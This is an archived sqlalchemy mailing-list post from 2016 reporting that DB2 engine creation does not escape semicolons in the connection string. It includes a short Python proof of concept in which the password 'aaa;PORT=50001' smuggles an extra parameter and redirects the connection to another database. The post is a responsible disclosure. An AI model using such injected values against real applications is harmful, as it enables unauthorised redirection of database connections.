[sqlalchemy] Parameter injection issue upon db engine creation (tested with db2)

Fri, 29 Jul 2016 07:05:27 -0700 

Hi,

I discovered an issue in db engine creation code.
when the code prepares the db connection string it fails to escape the 
semicolon char. This makes it possible to inject arbitrary parameters in 
the connection string.
Under some circumstances this can be a security issue.

PoC:
I created two db2 instances in docker one is listening on  tcp/50000 
(default) and the other is on tcp/50001.

ActivePython 2.7.8.10 (ActiveState Software Inc.) based on
Python 2.7.8 (default, Jul  2 2014, 19:48:49) [MSC v.1500 64 bit (AMD64)] 
on win32
Type "help", "copyright", "credits" or "license" for more information.
>>> import sqlalchemy
>>> from sqlalchemy import *
>>> import ibm_db_sa
>>> from urllib import quote
>>> import sys
>>>
>>>* pw="aaa"*
>>> db2 = 
sqlalchemy.create_engine('ibm_db_sa://db2inst1:%s@192.168.99.100/test' %  
quote(pw))
>>> conn = db2.connect()
>>> conn.execute("select host_name from TABLE(SYSPROC.ENV_GET_SYS_INFO()) 
AS SYSTEMINFO").fetchall()
*[(u'b5b9411e889e',)]*
>>> conn.close()
>>>
>>>* pw="aaa;PORT=50001"*
>>> db2 = 
sqlalchemy.create_engine('ibm_db_sa://db2inst1:%s@192.168.99.100/test' %  
quote(pw))
>>> conn = db2.connect()
>>> conn.execute("select host_name from TABLE(SYSPROC.ENV_GET_SYS_INFO()) 
AS SYSTEMINFO").fetchall()
*[(u'e6aa666c18bf',)]*
>>> conn.close()
>>> sqlalchemy.__version__
'0.9.8'

As you can see I was able to trick the program to connect to an alternative 
database via the password. (Which is a realistic vector I think.)

My sqlalchemy version is not the latest because I installed it from the 
ActiveState repo. If you've already fixed this then ignore my message. 
Unfortunately I don't have time to further test this with other versions or 
DB drivers.

Regards

Miklós

-- 
You received this message because you are subscribed to the Google Groups 
"sqlalchemy" group.
To unsubscribe from this group and stop receiving emails from it, send an email 
to sqlalchemy+unsubscr...@googlegroups.com.
To post to this group, send email to sqlalchemy@googlegroups.com.
Visit this group at https://groups.google.com/group/sqlalchemy.
For more options, visit https://groups.google.com/d/optout.

Reply via email to